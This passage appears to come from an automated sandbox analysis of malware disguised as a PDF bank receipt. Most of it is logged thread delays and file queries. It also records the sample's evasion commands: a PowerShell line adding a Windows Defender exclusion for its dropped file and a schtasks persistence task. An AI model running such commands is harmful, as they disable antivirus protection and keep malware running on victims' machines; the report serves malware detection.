                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -595062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594509s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594278s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594160s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -594041s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe TID: 7808Thread sleep time: -593812s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 7908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -27670116110564310s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599782s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599657s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599532s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599407s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599297s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599188s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -599047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598938s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598594s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598356s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598228s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -598110s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597910s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597766s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597652s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597438s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -597079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596579s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596454s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -596079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595579s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595454s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -595079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594829s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594704s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594579s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594454s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594329s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -594079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe TID: 8080Thread sleep time: -593954s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599686Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599575Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599467Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599140Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 599031Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598922Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598812Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598593Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598363Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598243Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596970Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596727Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596614Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596264Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595608Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595172Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594843Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594509Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594278Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594160Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 594041Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeThread delayed: delay time: 593812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599891
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599782
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599657
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599297
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 599047
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598594
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598469
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598356
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598228
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 598110
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597910
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597766
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597652
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597547
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597438
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 597079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 596079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 595079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594954
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594829
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594704
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594579
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594454
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594329
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594204
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 594079
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeThread delayed: delay time: 593954
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4149391535.0000000000EF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<5l
                  Source: teXfNv.exe, 0000000B.00000002.4149232690.0000000000D67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeMemory written: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeMemory written: C:\Users\user\AppData\Roaming\teXfNv.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeProcess created: C:\Users\user\AppData\Roaming\teXfNv.exe "C:\Users\user\AppData\Roaming\teXfNv.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
